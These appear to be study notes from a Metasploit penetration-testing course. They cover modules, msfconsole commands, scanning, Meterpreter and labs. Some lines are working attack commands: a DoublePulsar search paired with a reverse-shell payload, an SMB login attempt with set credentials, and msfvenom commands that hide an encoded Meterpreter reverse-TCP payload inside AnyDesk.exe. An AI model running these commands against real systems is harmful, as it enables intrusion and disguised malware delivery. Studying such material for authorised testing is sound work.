Metasploit

• Vulnerability vs Pen-Testing
• Nessus - https://www.tenable.com/
• NMAP
• w3af - https://w3af.org/ w3af is an open-source web application security scanning tool.
• Armitage - Armitage is an exploit automation framework that uses Metasploit at the backend. apt-get install armitage

Browse the directories

ls -al /usr/share/metasploit-framework
/usr/share/metasploit/framework/modules
hosts -u
shell

Brief History

• https://pentest.tonyng.net/list-of-metasploit-commands-cheatsheet/
• HD Moore - released first version in 2003 with 11 exploits written in Perl
• Open Source Project
• re-written in 2007 in Ruby (Version 3)
• acquired by Rapid7 in 2009
• supports 2000+ exploits and 3000+ modules
• has exploits for all major OS, products and services
• 2020 -> supported social engineering test
• Supports automation and integrations even with FREE version
• Clean exploits (no backdoors!!)

Install in Windows

• Download the latest Metasploit Windows installer from: https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version.

Metasploit is a FRAMEWORK

• Not the only player in the market - Cobaltstrike
• allows creation of workspace to keep projects separate

Metasploit Modules

auxiliary modules (pre-exploitation)

• recon stage
• scanning stage
• 1000+ auxiliary modules spread across 18 categories in the Metasploit Framework.
• Example modules: gather, pdf, vsploit, bnat, sqli, client, crawler, fuzzers
• show auxiliary
• search tcp type:auxiliary
• use auxiliary/scanner/portscan/tcp
• show options

Exploits

• Gaining access

Encoders

The job of the encoders is to obfuscate our exploit

Payloads

• Singles - completely self-contained unit of the exploit and require shellcode; they have everything that is required to exploit the vulnerability on the target.
• Stagers - The stagers payload simply sets up a connection between the attacking system and the target system. It doesn't have the shellcode necessary to exploit the vulnerability on the target system
• Stages - Once STAGER is able to make a successful connection, a STAGE is downloaded that has the exploit code. It need a shellcode to run.

NOPS (No operation)

• NOPs are used to reach a desired place in the memory addresses
• NOPs are commonly supplied before the start of the ShellCode to ensure its successful execution in the memory while performing no operations and just sliding through the memory addresses
• The \x90 instruction represents a NOP instruction in the hexadecimal format.

POST module (post exploitation)

• privilege escalation
• Dump OS credentials
• Steal cookies and saved passwords
• Get key logs from the target system
• Execute PowerShell scripts
• persistent access

Libraries

REX - basic library, SSL, sockets, TCP/IP, SMB

MSF Core - basic API

MSF Base - config, session, logging

MSF UI - Drivers, CLI, GUI

USE CASES

• Information Gathering Auxiliary modules: portscan/syn, portscan/tcp, db_nmap, scanner/ftp/ftp_version, and gather/shodan_search
• Enumeration smb/smb_enumshares, smb/smb_enumusers, and smb/smb_login
• Gaining Access Integration with all Metasploit exploits and payloads
• Privilege Escalation meterpreter-use priv; meterpreter-getsystem
• Maintaining Access meterpreter - run persistence
• Covering Tracks Metasploit Anti-Forensics Project

Reporting is a PRO version feature

System requirement

• Kali Linux
• Parrot

Set up metasploit for testing

• Supported in all major OS
• for windows, install and check for postgres database

Workspace

workspace -a new_workspace
workspace -d old_worlspace

db_status
# rename the config file
# check sample config from metasploit-framework/embedded/framework/config/database.yml.example

Metasploit Interfaces

MSFconsole

• interactive shell
• for scripting use msfconsole -x

MSFcli

• no longer in development since 2015
• can convert steps into scripts

Armitage (GUI wrapper)

• no longer per-installed

MSFCONSOLE

some quick commands

• connect cnn.com 80
• route -> to add / delete routes
• save -> to save configuration
• sessions -> show active sessions
• spool -> to send console output to a log file
• show -h -> show whats there
• irb -> interactive RUBY
• makerc -> record the commands from all msf work.

Updare MSF

• msfupdate

banner

help

search
search auxiliary
search exploits
search portscan
search windows
search mac
search platform:windows 
search port:21
search port:22
search port:22 type:exploits
search -h

use 
set RHOSTS
set PORTS
run


search cve:2017 type:exploit

search port:22 type:exploits
info 10

nmap

nmap 192.168.1.1/24 -v

**db_nmap 192.168.1.1/24 -v**

A payload is automatically attached to an exploit

search smb
search doublepulsar
use 1
set payload windows/x64/shell_reverse_tcp
info
show options

RHOST

• IP of the remote host

LHOST

• IP of the local host

Check status of database

should be running

* systemctl start postgresql
* msfdb status

for reinitialization

msfdb reinit
msfdb status

Meterpreter

• Meterpreter is an advanced payload that uses in-memory Dynamic Link Library (DLL) injection
• in-memory DLL injection (all in memory)
• Client server model, victims machine behaves as the server
• https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

Information gathering

Passive information gathering

* msf > ping google.com
* traceroute ping google.com
* dig google.com

Active information gathering

msf> nmap 192.168.1.100 -oA saved.txt
msf> db_import database.xml
# command below automatically imports database from the nmap command
msf> db_nmap 
msf>hosts

search type:auxiliary path:auxiliary/scanner port:22
use 0
show options
set RHOST 10.0.0.1
show options
run
back

Setting RHOST globally

setg RHOST 10.0.0.1
unset RHOSTS
hosts -R

finding an auxiliary scanner

search type:auxiliary path:auxiliary/scanner tcp
use 23
show options
run

Vulnerability Assessment with Metasploit

WMAP

• based on SQLMAP

load wmap
>wmap_sites -a 10.0.0.100
>wmap_sites -l
>wmap_targets -t 10.0.0.101
>wmap_run -t
>wmap_run -e
>wmap_vulns -l

Importing Nessus Scan

• export as .nessus file type
• db_import scan.nessus
• hosts
• vulns

Exploiting Taget hosts

search
use
run

nmap host
search port 21
use 18
info
show options

MSFVENOM

MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.

The advantages of msfvenom are:

One single tool
Standardized command line options
Increased speed

• msfvenom --list payloads
• https://www.offensive-security.com/metasploit-unleashed/Msfvenom/

Meterpreter

• https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/
• It is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
• Meterpreter is deployed using in-memory DLL injection.
• Meterpreter resides entirely in memory and writes nothing to disk.
• Forensic footprint of an attack is very limited.

Lab - SMB_LOGIN

• What can you do? Server Message Block (SMB) is an application layer protocol primarily used for sharing files, printers, and so on. SMB uses TCP port 445 for communication. auxiliary/scanner/smb/smb_version

• https://www.offensive-security.com/metasploit-unleashed/smb-login-check/

74  search smb_login
75  use 0
76  show options
77  set RHOSTS 192.168.0.32
78  set smbuser student
79  set SMBpass student
80  show options
81  exploit
82  ping 192.168.0.31
83  connect 192.168.0.32
84  show options
85  run
86  history

LAB 3

• msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x /home/student/Desktop/AnyDesk.exe

• sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodWinMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=192.168.0.31 lport=4949 -x /home/student/Desktop/AnyDesk.exe